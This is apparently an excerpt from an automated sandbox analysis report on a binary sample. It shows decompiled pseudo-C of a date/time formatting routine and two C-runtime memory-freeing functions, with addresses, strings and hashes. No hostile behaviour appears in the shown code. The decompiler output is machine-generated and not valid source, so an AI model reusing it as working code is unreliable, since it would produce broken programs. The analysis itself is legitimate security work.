Instruction ID: a8d1af7ddfee7ef482feebcaa1c930301f2a2d3a4f2f56c0f5423d8735ca1741
Opcode Fuzzy Hash: fe9a0a5e48d8e06275b5b9f05d132e4e16e8902de957c61f234be3b225150414
Instruction Fuzzy Hash: 2BB1D91590D0D659EF0A46B440A43FFAFB65F53340F1C90EAC5966FB87C17A8A85C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00D940C0 Relevance: 24.9, APIs: 6, Strings: 8, Instructions: 403
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00D940C0(void* __ebx, void* __fp0, signed int _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				char _v116;
				char _v124;
				signed int _v148;
				signed int _v152;
				char _v164;
				intOrPtr _v168;
				char* _v172;
				char* _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				char* _v240;
				unsigned int _v244;
				char _v245;
				signed int _v252;
				char _v261;
				signed int _v268;
				unsigned int _v272;
				unsigned int _v276;
				unsigned int _v284;
				void* __edi;
				signed int __esi;
				signed int _t109;
				intOrPtr _t116;
				char _t121;
				char _t124;
				void* _t126;
				char _t132;
				signed int _t134;
				void* _t135;
				signed int _t137;
				char _t138;
				void* _t140;
				intOrPtr _t143;
				intOrPtr* _t146;
				signed int _t150;
				intOrPtr _t152;
				intOrPtr* _t163;
				void* _t164;
				void* _t166;
				void* _t167;
				intOrPtr _t169;
				void* _t170;
				intOrPtr* _t171;
				signed int _t172;
				signed int _t173;
				intOrPtr* _t175;
				signed int _t177;
				void* _t179;
				signed int _t180;
				signed int _t182;
				void* _t196;
				void* _t199;

				_t199 = __fp0;
				_t140 = __ebx;
				_t182 = (_t180 & 0xfffffff0) - 0xf8;
				_t109 =  *0xed8944; // 0xccebfc3b
				_v8 = _t109 ^ _t182;
				_t111 = _a4;
				_t169 = _a8;
				_v180 = _a4;
				_t163 = _a12;
				if(_t169 == 0) {
					L69:
					_pop(_t164);
					_pop(_t170);
					return E00E76672(_t111, _t140, _v8 ^ _t182, _t160, _t164, _t170);
				} else {
					_t143 =  *_t163;
					if(_t143 == 0) {
						goto L69;
					} else {
						_t160 =  *(_t143 + 8) & 0x0000ffff;
						_t111 = _t160 & 0x00000202;
						if((_t160 & 0x00000202) != 0x202 ||  *((char*)(_t143 + 0xa)) != 1) {
							if((_t160 & 0x00000001) != 0) {
								goto L69;
							} else {
								_t160 = 1;
								_t111 = E00DB58E0(1, _t163);
								goto L7;
							}
						} else {
							_t111 =  *(_t143 + 0x10);
							L7:
							_v184 = _t111;
							if(_t111 == 0) {
								goto L69;
							} else {
								_t160 = _t169 - 1;
								_t171 = _v180;
								_t111 = E00D93BD0(_t171, _t169 - 1, _t199, _t163 + 4,  &_v244);
								_t182 = _t182 + 8;
								if(_t111 != 0) {
									goto L69;
								} else {
									_t146 = _v184;
									_t172 = 1;
									_t160 =  *( *_t171 + 0x20);
									_t116 =  *_t146;
									_v176 = _t160;
									if(_t116 == 0) {
										L27:
										_v252 =  &_v116;
										goto L28;
									} else {
										do {
											if(_t116 != 0x25) {
												goto L18;
											} else {
												_t138 =  *((char*)(_t146 + 1));
												_t146 = _t146 + 1;
												_t111 = _t138 + 0xffffffdb;
												if(_t111 > 0x52) {
													goto L69;
												} else {
													switch( *((intOrPtr*)(( *(_t111 + 0xd94644) & 0x000000ff) * 4 +  &M00D9462C))) {
														case 0:
															goto L18;
														case 1:
															_t172 = _t172 + 1;
															goto L17;
														case 2:
															__esi = __esi + 0x32;
															goto L17;
														case 3:
															__esi = __esi + 8;
															goto L17;
														case 4:
															__esi = __esi + 3;
															L17:
															asm("adc edi, 0x0");
															goto L18;
														case 5:
															goto L69;
													}
												}
											}
											goto L70;
											L18:
											_t116 =  *((intOrPtr*)(_t146 + 1));
											_t146 = _t146 + 1;
											_t172 = _t172 + 1;
											asm("adc edi, 0x0");
										} while (_t116 != 0);
										if(0 != 0 || _t172 >= 0x64) {
											_t132 = _t160[0x64];
											asm("cdq");
											_t196 = 0 - _t160;
											if(_t196 < 0 || _t196 <= 0 && _t172 <= _t132) {
												asm("cdq");
												_t134 = E00D95440(_t160, _t172, _t160);
												_t182 = _t182 + 8;
												_v252 = _t134;
												if(_t134 != 0) {
													L28:
													E00D92A90( &_v244, 0);
													E00D92EF0( &_v244, _t160);
													E00D93040( &_v244);
													_t173 = _v184;
													_t166 = 0;
													_t121 =  *_t173;
													if(_t121 != 0) {
														asm("movsd xmm1, [esp+0x30]");
														asm("movaps xmm0, [esp+0x30]");
														asm("movaps xmm2, [esp+0x20]");
														_t160 = _v240;
														asm("movaps xmm3, [esp+0x10]");
														do {
															if(_t121 == 0x25) {
																_t124 =  *((intOrPtr*)(_t173 + 1));
																_v245 = _t124;
																_t126 = _t124 + 0xffffffb8;
																_v184 = _t173 + 1;
																if(_t126 > 0x2f) {
																	L63:
																	 *((char*)(_t166 + _v252)) = 0x25;
																	goto L64;
																} else {
																	switch( *((intOrPtr*)(( *(_t126 + 0xd946c8) & 0x000000ff) * 4 +  &M00D94698))) {
																		case 0:
																			_push(_v224);
																			goto L35;
																		case 1:
																			__esi = _v252;
																			__esi = _v252 + __edi;
																			__eax = L00E76FE0(__eax, __ecx);
																			asm("divsd xmm0, [0xece888]");
																			__esp = __esp - 8;
																			asm("movsd [esp], xmm0");
																			_push("%.16g");
																			_push(__esi);
																			_push(0x14);
																			__eax = E00D976B0(__ebx, __edi);
																			__esp = __esp + 0x14;
																			if(__esi != 0) {
																				__ecx = __esi + 1;
																				do {
																					__al =  *__esi;
																					__esi = __esi + 1;
																				} while (__al != 0);
																				__esi = __esi - __ecx;
																				__esi = __esi & 0x3fffffff;
																			}
																			goto L37;
																		case 2:
																			_push(_v220);
																			goto L35;
																		case 3:
																			asm("cvttsd2si eax, xmm1");
																			_push(__eax);
																			goto L35;
																		case 4:
																			asm("movaps [esp+0x60], xmm3");
																			__ecx =  &_v164;
																			asm("movaps [esp+0x70], xmm2");
																			asm("movaps [esp+0x80], xmm0");
																			_v124 = 0;
																			_v152 = 1;
																			_v148 = 1;
																			__eax = E00D92A90( &_v164, __edi);
																			_v244 = _v244 - _v164;
																			__eax = _v240;
																			asm("sbb eax, [esp+0x64]");
																			__ecx = _v244 - _v164 + 0x2932e00;
																			asm("adc eax, 0x0");
																			__esi = E00E9F5C0(_v244 - _v164 + 0x2932e00, _v240, 0x5265c00, 0);
																			_v268 = _v268 + __edi;
																			_v184 = _v268 + __edi;
																			if(_v261 != 0x57) {
																				_t79 = __esi + 1; // 0x1
																				__eax = _t79;
																				_v172 = "%03d";
																				_v176 = 4;
																				__esi = 3;
																				__eax = E00D976B0(__ebx, __edi, _v176, _v168, _v172, _t79);
																			} else {
																				__edx = _v244;
																				__ecx = _v240;
																				__edx = _v244 + 0x2932e00;
																				asm("adc ecx, 0x0");
																				_v176 = 3;
																				_v172 = "%02d";
																				__eax = E00E9F5C0(_v244 + 0x2932e00, _v240, 0x5265c00, 0);
																				__esi = __esi - __eax;
																				__eax = 0x92492493;
																				__esi = __esi + 7;
																				__edx = 0x92492493 * __esi >> 0x20;
																				__eax = 0x92492493 * __esi;
																				__edx = (0x92492493 * __esi >> 0x20) + __esi;
																				__esi = 2;
																				__edx = __edx >> 2;
																				__eax = (__edx >> 0x1f) + __edx;
																				__eax = E00D976B0(__ebx, __edi, _v208, _v200, _v204, (__edx >> 0x1f) + __edx);
																			}
																			goto L36;
																		case 5:
																			__esi = _v252;
																			__esi = _v252 + __edi;
																			__eax = E00D976B0(__ebx, __edi, 5, __esi, "%04d", _v236);
																			if(__esi != 0) {
																				__ecx = __esi + 1;
																				do {
																					__al =  *__esi;
																					__esi = __esi + 1;
																				} while (__al != 0);
																				__esi = __esi - __ecx;
																				__esi = __esi & 0x3fffffff;
																			}
																			goto L37;
																		case 6:
																			_push(_v228);
																			goto L35;
																		case 7:
																			asm("movsd xmm0, [0xece848]");
																			__esp = __esp - 8;
																			__esi = _v252;
																			asm("minsd xmm0, xmm1");
																			__esi = _v252 + __edi;
																			asm("movsd [esp], xmm0");
																			_push("%06.3f");
																			_push(__esi);
																			_push(7);
																			__eax = E00D976B0(__ebx, __edi);
																			__esp = __esp + 0x14;
																			if(__esi != 0) {
																				__ecx = __esi + 1;
																				do {
																					__al =  *__esi;
																					__esi = __esi + 1;
																				} while (__al != 0);
																				__esi = __esi - __ecx;
																				__esi = __esi & 0x3fffffff;
																			}
																			asm("movsd xmm1, [esp+0x30]");
																			asm("movaps xmm0, [esp+0x30]");
																			asm("movaps xmm2, [esp+0x20]");
																			asm("movaps xmm3, [esp+0x10]");
																			__edx = _v240;
																			__ecx = _v244;
																			goto L65;
																		case 8:
																			_push(_v232);
																			L35:
																			_push("%02d");
																			_push(_v252 + _t166);
																			_push(3);
																			E00D976B0(_t140, _t166);
																			_t177 = 2;
																			L36:
																			_t182 = _t182 + 0x10;
																			goto L37;
																		case 9:
																			__esi = _v252;
																			__esi = _v252 + __edi;
																			E00E9F5C0(__ecx, __edx, 0x3e8, 0) = __eax - 0x18a36940;
																			asm("sbb edx, 0x31");
																			_push(__edx);
																			__eax = E00D976B0(__ebx, __edi, 0x1e, __esi, "%lld", __eax);
																			if(__esi == 0) {
																				L37:
																				asm("movsd xmm1, [esp+0x30]");
																				asm("movaps xmm0, [esp+0x30]");
																				asm("movaps xmm2, [esp+0x20]");
																				asm("movaps xmm3, [esp+0x10]");
																				_t160 = _v240;
																				goto L65;
																			} else {
																				__ecx = __esi + 1;
																				do {
																					__al =  *__esi;
																					__esi = __esi + 1;
																				} while (__al != 0);
																				__esi = __esi - __ecx;
																				__esi = __esi & 0x3fffffff;
																				goto L37;
																			}
																			goto L66;
																		case 0xa:
																			__ecx = __ecx + 0x7b98a00;
																			__eax = __edx;
																			asm("adc eax, 0x0");
																			__eax = E00E9F5C0(__ecx, __edx, 0x5265c00, 0);
																			__eax = L00E9F750(__eax, __edx, 7, 0);
																			__ecx = _v284;
																			__al = __al + 0x30;
																			asm("movsd xmm1, [esp+0x30]");
																			asm("movaps xmm0, [esp+0x30]");
																			asm("movaps xmm2, [esp+0x20]");
																			asm("movaps xmm3, [esp+0x10]");
																			__edx = _v272;
																			 *((char*)(__edi + _v284)) = __al;
																			__ecx = _v276;
																			goto L64;
																		case 0xb:
																			goto L63;
																	}
																}
															} else {
																 *((char*)(_t166 + _v252)) = _t121;
																L64:
																_t177 = 1;
															}
															L65:
															_t166 = _t166 + _t177;
															_t173 = _v184 + 1;
															_v184 = _t173;
															_t121 =  *_t173;
														} while (_t121 != 0);
													}
													L66:
													_t150 = _v252;
													_t175 = _v180;
													_t123 =  ==  ? _t150 | 0xffffffff : E00D95020;
													 *((char*)(_t166 + _t150)) = 0;
													_t160 = _t150;
													_t111 = E00DB5560( *_t175, _t150, 0xffffffff, 1,  ==  ? _t150 | 0xffffffff : E00D95020);
													_t182 = _t182 + 0xc;
													if(_t111 == 0x12) {
														_t152 =  *_t175;
														 *(_t175 + 0x14) = _t111;
														 *((char*)(_t175 + 0x19)) = 1;
														goto L68;
													}
													goto L69;
												} else {
													_t135 = E00DBBCE0(_v180);
													_pop(_t167);
													_pop(_t179);
													return E00E76672(_t135, _t140, _v8 ^ _t182 + 0x00000004, _t160, _t167, _t179);
												}
											} else {
												_t137 = _v180;
												_t152 =  *_t137;
												 *((intOrPtr*)(_t137 + 0x14)) = 0x12;
												 *((char*)(_t137 + 0x19)) = 1;
												L68:
												_t160 = "string or blob too big";
												_t111 = E00DB5560(_t152, "string or blob too big", 0xffffffff, 1, 0);
												_t182 = _t182 + 0xc;
												goto L69;
											}
										} else {
											goto L27;
										}
									}
								}
							}
						}
					}
				}
				L70:
			}

0x00d940c0
0x00d940c0
0x00d940c6
0x00d940cc
0x00d940d3
0x00d940da
0x00d940de
0x00d940e1
0x00d940e6
0x00d940eb
0x00d94618
0x00d9461f
0x00d94620
0x00d9462b
0x00d940f1
0x00d940f1
0x00d940f5
0x00000000
0x00d940fb
0x00d940fb
0x00d94101
0x00d9410b
0x00d9411b
0x00000000
0x00d94121
0x00d94121
0x00d94123
0x00000000
0x00d94123
0x00d94113
0x00d94113
0x00d94128
0x00d94128
0x00d9412e
0x00000000
0x00d94134
0x00d9413c
0x00d9413f
0x00d94146
0x00d9414b
0x00d94150
0x00000000
0x00d94156
0x00d9415a
0x00d9415e
0x00d94163
0x00d94166
0x00d94168
0x00d9416e
0x00d94220
0x00d94227
0x00000000
0x00d94174
0x00d94174
0x00d94176
0x00000000
0x00d94178
0x00d94178
0x00d9417c
0x00d9417d
0x00d94183
0x00000000
0x00d94189
0x00d94190
0x00000000
0x00000000
0x00000000
0x00d94197
0x00000000
0x00000000
0x00d941a6
0x00000000
0x00000000
0x00d9419c
0x00000000
0x00000000
0x00d941a1
0x00d941a9
0x00d941a9
0x00000000
0x00000000
0x00000000
0x00000000
0x00d94190
0x00d94183
0x00000000
0x00d941ac
0x00d941ac
0x00d941af
0x00d941b0
0x00d941b3
0x00d941b6
0x00d941bc
0x00d941c3
0x00d941c6
0x00d941c7
0x00d941c9
0x00d941ed
0x00d941f0
0x00d941f5
0x00d941f8
0x00d941fe
0x00d9422b
0x00d9422f
0x00d94238
0x00d94241
0x00d94246
0x00d9424a
0x00d9424c
0x00d94250
0x00d94256
0x00d9425c
0x00d94261
0x00d94266
0x00d9426a
0x00d94273
0x00d94275
0x00d94287
0x00d9428b
0x00d94292
0x00d94295
0x00d9429c
0x00d945a4
0x00d945a8
0x00000000
0x00d942a2
0x00d942a9
0x00000000
0x00d94353
0x00000000
0x00000000
0x00d94466
0x00d9446a
0x00d9446c
0x00d94471
0x00d94479
0x00d9447c
0x00d94481
0x00d94486
0x00d94487
0x00d94489
0x00d9448e
0x00d94493
0x00d94499
0x00d944a0
0x00d944a0
0x00d944a2
0x00d944a3
0x00d944a7
0x00d944a9
0x00d944a9
0x00000000
0x00000000
0x00d944bd
0x00000000
0x00000000
0x00d94514
0x00d94518
0x00000000
0x00000000
0x00d9435c
0x00d94361
0x00d94365
0x00d9436a
0x00d94372
0x00d9437a
0x00d94382
0x00d9438a
0x00d94393
0x00d94397
0x00d9439b
0x00d9439f
0x00d943ac
0x00d943b6
0x00d943bc
0x00d943c3
0x00d943c7
0x00d94437
0x00d94437
0x00d9443a
0x00d94447
0x00d9444f
0x00d9445c
0x00d943c9
0x00d943c9
0x00d943cd
0x00d943d1
0x00d943de
0x00d943e1
0x00d943eb
0x00d943f3
0x00d94403
0x00d94405
0x00d9440a
0x00d9440d
0x00d9440d
0x00d9440f
0x00d94411
0x00d94416
0x00d9441e
0x00d9442d
0x00d9442d
0x00000000
0x00000000
0x00d9456e
0x00d94577
0x00d9457c
0x00d94586
0x00d9458c
0x00d94590
0x00d94590
0x00d94592
0x00d94593
0x00d94597
0x00d94599
0x00d94599
0x00000000
0x00000000
0x00d942b0
0x00000000
0x00000000
0x00d942f1
0x00d942f9
0x00d942fc
0x00d94300
0x00d94304
0x00d94306
0x00d9430b
0x00d94310
0x00d94311
0x00d94313
0x00d94318
0x00d9431d
0x00d9431f
0x00d94322
0x00d94322
0x00d94324
0x00d94325
0x00d94329
0x00d9432b
0x00d9432b
0x00d94331
0x00d94337
0x00d9433c
0x00d94341
0x00d94346
0x00d9434a
0x00000000
0x00000000
0x00d944b4
0x00d942b4
0x00d942b8
0x00d942bf
0x00d942c0
0x00d942c2
0x00d942c7
0x00d942cc
0x00d942cc
0x00000000
0x00000000
0x00d944c6
0x00d944d3
0x00d944da
0x00d944df
0x00d944e2
0x00d944ec
0x00d944f6
0x00d942cf
0x00d942cf
0x00d942d5
0x00d942da
0x00d942df
0x00d942e4
0x00000000
0x00d944fc
0x00d944fc
0x00d94500
0x00d94500
0x00d94502
0x00d94503
0x00d94507
0x00d94509
0x00000000
0x00d94509
0x00000000
0x00000000
0x00d9451e
0x00d94524
0x00d9452d
0x00d94532
0x00d9453d
0x00d94542
0x00d94546
0x00d94548
0x00d9454e
0x00d94553
0x00d94558
0x00d9455d
0x00d94561
0x00d94564
0x00000000
0x00000000
0x00000000
0x00000000
0x00d942a9
0x00d94277
0x00d9427b
0x00d945ac
0x00d945ac
0x00d945ac
0x00d945b1
0x00d945b1
0x00d945b7
0x00d945b8
0x00d945bc
0x00d945be
0x00d94273
0x00d945c6
0x00d945c6
0x00d945db
0x00d945df
0x00d945e2
0x00d945e9
0x00d945ef
0x00d945f4
0x00d945fa
0x00d945fc
0x00d945fe
0x00d94601
0x00000000
0x00d94601
0x00000000
0x00d94200
0x00d94204
0x00d9420c
0x00d9420d
0x00d9421f
0x00d9421f
0x00d941d1
0x00d941d1
0x00d941d5
0x00d941d7
0x00d941de
0x00d94605
0x00d9460b
0x00d94610
0x00d94615
0x00000000
0x00d94615
0x00000000
0x00000000
0x00000000
0x00d941bc
0x00d9416e
0x00d94150
0x00d9412e
0x00d9410b
0x00d940f5
0x00000000

Strings

%lld, xrefs: 00D944E4
%06.3f, xrefs: 00D9430B
%.16g, xrefs: 00D94481
\, xrefs: 00D943EB
W, xrefs: 00D943BE
%04d, xrefs: 00D94572
%02d, xrefs: 00D942B8
string or blob too big, xrefs: 00D9460B

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: %.16g$%02d$%04d$%06.3f$%lld$W$string or blob too big$\
API String ID: 0-2678133291
Opcode ID: abd6f6ba1fe03c64b5a96ee5a3d245d9325f6976e48b021f17824cd9f75b56a3
Instruction ID: 594692bc89854800bc7049618e58aae3abd2ecc05934aa4f797ae493d99ab026
Opcode Fuzzy Hash: abd6f6ba1fe03c64b5a96ee5a3d245d9325f6976e48b021f17824cd9f75b56a3
Instruction Fuzzy Hash: DBE116719087819BDB25CF28C801F6BBBE5BF95304F094A5CFCD567292D731D8468BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E963C4 Relevance: 19.6, APIs: 13, Instructions: 88
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00E963C4(intOrPtr _a4) {
				intOrPtr _t15;
				intOrPtr _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t54 = _a4;
				if(_t54 != 0) {
					_t56 =  *((intOrPtr*)(_t54 + 0xc)) -  *0xed89dc; // 0xede740
					if(_t56 != 0) {
						E00E8EC89(_t16);
					}
					_t57 =  *((intOrPtr*)(_t54 + 0x10)) -  *0xed89e0; // 0xede740
					if(_t57 != 0) {
						E00E8EC89(_t17);
					}
					_t58 =  *((intOrPtr*)(_t54 + 0x14)) -  *0xed89e4; // 0xede740
					if(_t58 != 0) {
						E00E8EC89(_t18);
					}
					_t59 =  *((intOrPtr*)(_t54 + 0x18)) -  *0xed89e8; // 0xede740
					if(_t59 != 0) {
						E00E8EC89(_t19);
					}
					_t60 =  *((intOrPtr*)(_t54 + 0x1c)) -  *0xed89ec; // 0xede740
					if(_t60 != 0) {
						E00E8EC89(_t20);
					}
					_t61 =  *((intOrPtr*)(_t54 + 0x20)) -  *0xed89f0; // 0xede740
					if(_t61 != 0) {
						E00E8EC89(_t21);
					}
					_t62 =  *((intOrPtr*)(_t54 + 0x24)) -  *0xed89f4; // 0xede740
					if(_t62 != 0) {
						E00E8EC89(_t22);
					}
					_t63 =  *((intOrPtr*)(_t54 + 0x38)) -  *0xed8a08; // 0xede744
					if(_t63 != 0) {
						E00E8EC89(_t23);
					}
					_t64 =  *((intOrPtr*)(_t54 + 0x3c)) -  *0xed8a0c; // 0xede744
					if(_t64 != 0) {
						E00E8EC89(_t24);
					}
					_t65 =  *((intOrPtr*)(_t54 + 0x40)) -  *0xed8a10; // 0xede744
					if(_t65 != 0) {
						E00E8EC89(_t25);
					}
					_t66 =  *((intOrPtr*)(_t54 + 0x44)) -  *0xed8a14; // 0xede744
					if(_t66 != 0) {
						E00E8EC89(_t26);
					}
					_t67 =  *((intOrPtr*)(_t54 + 0x48)) -  *0xed8a18; // 0xede744
					if(_t67 != 0) {
						E00E8EC89(_t27);
					}
					_t15 =  *((intOrPtr*)(_t54 + 0x4c));
					_t68 = _t15 -  *0xed8a1c; // 0xede744
					if(_t68 != 0) {
						return E00E8EC89(_t15);
					}
				}
				return _t15;
			}

0x00e963ca
0x00e963cf
0x00e963d8
0x00e963de
0x00e963e1
0x00e963e6
0x00e963ea
0x00e963f0
0x00e963f3
0x00e963f8
0x00e963fc
0x00e96402
0x00e96405
0x00e9640a
0x00e9640e
0x00e96414
0x00e96417
0x00e9641c
0x00e96420
0x00e96426
0x00e96429
0x00e9642e
0x00e96432
0x00e96438
0x00e9643b
0x00e96440
0x00e96444
0x00e9644a
0x00e9644d
0x00e96452
0x00e96456
0x00e9645c
0x00e9645f
0x00e96464
0x00e96468
0x00e9646e
0x00e96471
0x00e96476
0x00e9647a
0x00e96480
0x00e96483
0x00e96488
0x00e9648c
0x00e96492
0x00e96495
0x00e9649a
0x00e9649e
0x00e964a4
0x00e964a7
0x00e964ac
0x00e964ad
0x00e964b0
0x00e964b6
0x00000000
0x00e964be
0x00e964b6
0x00e964c1

APIs

_free.LIBCMT ref: 00E963E1

Part of subcall function 00E8EC89: HeapFree.KERNEL32(00000000,00000000,?,00E96B19,?,00000000,?,?,?,00E96DBC,?,00000007,?,?,00E973B2,?), ref: 00E8EC9F
Part of subcall function 00E8EC89: GetLastError.KERNEL32(?,?,00E96B19,?,00000000,?,?,?,00E96DBC,?,00000007,?,?,00E973B2,?,?), ref: 00E8ECB1

_free.LIBCMT ref: 00E963F3
_free.LIBCMT ref: 00E96405
_free.LIBCMT ref: 00E96417
_free.LIBCMT ref: 00E96429
_free.LIBCMT ref: 00E9643B
_free.LIBCMT ref: 00E9644D
_free.LIBCMT ref: 00E9645F
_free.LIBCMT ref: 00E96471
_free.LIBCMT ref: 00E96483
_free.LIBCMT ref: 00E96495
_free.LIBCMT ref: 00E964A7
_free.LIBCMT ref: 00E964B9

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 22b5b1b9a2e546fe9dc08230bc55aa91b6cd471f3392c77b740cbdf82e498519
Instruction ID: 595792a8a10bf9d6e377ea3df4f4ae69e3080e2f623740a0feae812d67f8c649
Opcode Fuzzy Hash: 22b5b1b9a2e546fe9dc08230bc55aa91b6cd471f3392c77b740cbdf82e498519
Instruction Fuzzy Hash: C3216172901250AFCAA0EBA9FB92C1A73E9FB003147656D07F05DF7640CA31FC804764

Uniqueness

Uniqueness Score: -1.00%

Function 00E9721B Relevance: 18.1, APIs: 12, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00E9721B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xed89d0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00E8EC89(_t46);
							E00E963C4( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00E8EC89(_t47);
							E00E96878( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00E8EC89( *((intOrPtr*)(_t74 + 0x7c)));
						E00E8EC89( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00E8EC89( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00E8EC89( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00E8EC89( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00E8EC89( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00E9738C( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xed8bc8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00E8EC89(_t31);
							E00E8EC89( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00E8EC89(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00E8EC89(_t74);
			}

0x00e97223
0x00e97227
0x00e9722f
0x00e97238
0x00e9723d
0x00e97244
0x00e9724c
0x00e97254
0x00e9725f
0x00e97265
0x00e97266
0x00e9726e
0x00e97276
0x00e97281
0x00e97287
0x00e9728b
0x00e97296
0x00e9729c
0x00e9723d
0x00e9729d
0x00e972a5
0x00e972b8
0x00e972cb
0x00e972d9
0x00e972e4
0x00e972e9
0x00e972f2
0x00e972fa
0x00e972fb
0x00e97301
0x00e97304
0x00e97307
0x00e9730e
0x00e97310
0x00e97314
0x00e9731c
0x00e97323
0x00e97329
0x00e9732a
0x00e9732a
0x00e97331
0x00e97333
0x00e97338
0x00e97340
0x00e97345
0x00e97346
0x00e97346
0x00e97349
0x00e9734c
0x00e9734f
0x00e97352
0x00e97352
0x00e97362

APIs

_free.LIBCMT ref: 00E97254

Part of subcall function 00E8EC89: HeapFree.KERNEL32(00000000,00000000,?,00E96B19,?,00000000,?,?,?,00E96DBC,?,00000007,?,?,00E973B2,?), ref: 00E8EC9F
Part of subcall function 00E8EC89: GetLastError.KERNEL32(?,?,00E96B19,?,00000000,?,?,?,00E96DBC,?,00000007,?,?,00E973B2,?,?), ref: 00E8ECB1

Part of subcall function 00E963C4: _free.LIBCMT ref: 00E963E1
Part of subcall function 00E963C4: _free.LIBCMT ref: 00E963F3
Part of subcall function 00E963C4: _free.LIBCMT ref: 00E96405
Part of subcall function 00E963C4: _free.LIBCMT ref: 00E96417
Part of subcall function 00E963C4: _free.LIBCMT ref: 00E96429
Part of subcall function 00E963C4: _free.LIBCMT ref: 00E9643B
Part of subcall function 00E963C4: _free.LIBCMT ref: 00E9644D
Part of subcall function 00E963C4: _free.LIBCMT ref: 00E9645F
Part of subcall function 00E963C4: _free.LIBCMT ref: 00E96471
Part of subcall function 00E963C4: _free.LIBCMT ref: 00E96483
Part of subcall function 00E963C4: _free.LIBCMT ref: 00E96495
Part of subcall function 00E963C4: _free.LIBCMT ref: 00E964A7
Part of subcall function 00E963C4: _free.LIBCMT ref: 00E964B9

_free.LIBCMT ref: 00E97276
_free.LIBCMT ref: 00E9728B
_free.LIBCMT ref: 00E97296
_free.LIBCMT ref: 00E972B8
_free.LIBCMT ref: 00E972CB
_free.LIBCMT ref: 00E972D9
_free.LIBCMT ref: 00E972E4
_free.LIBCMT ref: 00E9731C
_free.LIBCMT ref: 00E97323
_free.LIBCMT ref: 00E97340
_free.LIBCMT ref: 00E97358

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
